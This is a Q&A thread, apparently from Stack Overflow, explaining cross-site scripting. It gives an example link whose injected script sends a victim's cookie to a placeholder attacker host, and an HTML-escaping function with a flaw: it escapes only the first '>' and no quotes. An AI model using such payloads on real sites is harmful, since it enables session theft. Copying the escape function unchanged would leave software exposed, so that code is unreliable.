vote up 2 vote down star
1

Can someone explain how XSS works in plain english? Maybe with an example. Googling didn't help much.

flag
Do you mean Cross-site scripting? – iny Oct 27 '08 at 6:16

5 Answers

vote up 2 vote down

this Wikipedia Entry was easy enough.

link|flag
vote up 2 vote down

Cross Site Scripting basically is a security vulnerability of dynamic web pages where an attacker can create a malicious link to inject unwanted executable JavaScript into a Web site. The most usual case of this vulnerabilities occurs when GET variables are printed or echoed without filtering or checking their content.

When a victim clicks the link, the malicious code can then send the victim’s cookie away to another server, or it can modify the affected site, injecting forms, to steal usernames and passwords, and other phishing techniques.

Example of malicious link:

http://VulnerableHost/a.php?variable=<script>document.location='http://AttackersHost/cgi-bin/cookie.cgi%3Fdata='+document.cookie</script>

It's also common to encode the malicious code, for example in hex:

Malicious Link

link|flag
1  
It's a good thing SO is filtering that! :P – Bob Somers Oct 27 '08 at 6:50
Haha yes, this is a good example of proper escaping. Nice job Stack Overflow! :) – Jason Oct 23 at 14:12
vote up 2 vote down

An XSS vulnerability exists whenever a string from outside your application can be interpreted as code.

For example, if you're generating HTML by doing this:

<BODY>
  <?= $myQueryParameter ?>
 </BODY>

then if the $myQueryParameter variable contains a <SCRIPT> tag then it will end up executing code.

To prevent an input from being executed as code, you need to escape content properly.

The above problem can be solved by realizing that the $myQueryParameter variable contains plain text, but you can't just go and put plain text into HTML and expect it to work.

So you need to convert plain text to HTML so you can put it into your HTML page. That process of converting a string in one language to another so that it can be embedded is escaping.

You can escape plain text to HTML with a function like:

function escapePlainTextToHTML(plainText) {
  return plainText.replace(/\0/g, '').replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/, '&gt;');
}
link|flag
vote up 1 vote down

I'd consider Google Ads (or any other ad platform) as an example of XSS, athough probably not deemed an 'attack' if it's at the intent of the website author.

link|flag
vote up 0 vote down

A good resource of possible XSS techniques to inject scripts. Can be useful for testing your site against some of these:

http://ha.ckers.org/xss.html

link|flag

Your Answer

Get an OpenID
or

Not the answer you're looking for? Browse other questions tagged or ask your own question.